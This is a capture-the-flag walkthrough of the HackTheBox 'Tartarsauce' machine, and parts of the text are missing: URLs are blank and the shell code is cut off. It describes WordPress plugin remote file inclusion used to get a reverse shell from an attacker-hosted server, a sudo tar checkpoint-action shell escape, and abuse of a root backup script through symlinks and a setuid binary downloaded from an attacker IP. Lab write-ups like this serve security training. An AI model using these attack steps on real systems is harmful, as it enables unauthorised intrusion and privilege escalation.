HackTheBox - Tartarsauce

This box is about exploiting a vulnerable WordPress plugin which allows you to get a shell via Remote File Inclusion. Then you have to escalate to another user by running tar with sudo and root escalation is done by exploiting a user-created backup script.


Only port 80 is open so we start by enumerating the Webserver. Quickly we will find some entries in the robots.txt file:

User-agent: *
Disallow: /webservices/tar/tar/source
Disallow: /webservices/monstra-3.0.4
Disallow: /webservices/easy-file-uploader
Disallow: /webservices/phpmyadmin

The only valid directory is the monstra application. It’s just an empty blog page without much information. Suprisingly we are able to login with admin:admin at Sadly all functionality has been removed and the whole blog turns out to be a rabbithole.

Maybe there are more webservices that were not shown in the robots file? After running a directory scan against /webservices we discover a blank and broken WordPress blog at

Running wpscan against it reveals some interesting information:

wpscan -u --enumerate p

The scan found three installed plugins and two seem to be outdated (by the box release it was only one). Though wpscan didn’t show us any useful vulnerabilities we can find one by searching on the internet.


The gwolle-gb wordpress plugin has a Remote File Inclusion vulnerability (RFI):


So all we have to do is supply a malicious php file and we will achieve Code Execution.

As shown in the exploit description just visit the following url and exchange [host] with the ip from Tartarsauce and [hackers_website] with your ip.


Fire up a webserver python -m SimpleHTTPServer 80 and you will notice that is trying to GET a file called wp-load.php.

All you have to do now is change your malicious php file to that name and try again. For example you could use http://pentestmonkey.net/tools/web-shells/php-reverse-shell.

Privilege Escalation


We are allowed to run /bin/tar as the user onuma so this part is pretty straightforward, as the tar program allows for easy code execution. There is an argument called --checkpoint-action which allows us to execute stuff at a checkpoint. Our command would be:

sudo /bin/tar cf /dev/null test --checkpoint=1 --checkpoint-action=exec=/bin/sh


After looking through the system for a while we find a program called “backuperer”. The files /home/onuma/.mysql_history and /var/backups/onuma-backup-test.txt will point you to it.

Here the code from /usr/sbin/backuperer:


# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P

# Set Vars Here
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)

# formatting
    for n in $(seq 72);
    do /usr/bin/printf $"-";

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
    /usr/bin/diff -r $basedir $check$basedir

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0

I found two ways to exploit this script, one allows to read files owned by root and the second allows to gain a shell.

Method 1 (file read):

So the script performs an integrity check by diffing the temporary directory against the actual directory. If there are any differences, they will be logged in /var/backups/onuma_backup_error.txt.

Since the backuperer script is running as root we are able to log the contents of root owned files via symlinks:

Preperation as www-data:

cd /var/tmp
mkdir var var/www/ var/www/html
ln -s /root/root.txt /var/www/html/root.txt

As onuma:

cd /var/tmp
tar -czf malicious.tar.gz var

The script runs every 5 minutes so we have to wait until we see the temporary file pop up. From then you have 30 seconds to replace it with our malicious tar file.

Now we should be able to read the contents of root.txt logged inside of /var/backups/onuma_backup_error.txt.

Method 2 (root shell):

This method also relies on the integrity_chk function. If the check fails, the directory check/ won’t be removed which leaves us with the extracted files for 5 minutes.

On attacker box:

(Make sure to perform these commands as root)

int main(void){
gcc -m32 shell.c -o shell
mkdir var var/www var/www/html
cp shell var/www/html/index.html
chmod 6555 var/www/html/index.html
tar -zcvf shell.tar var/

On victim box:

wget http://[attacker_ip]/shell.tar

Wait 5 minutes and replace the temporary file like before

Once the script is done we should have a directory called “check” with var/www/html/index.html inside it.

Thats it for Tartarsauce!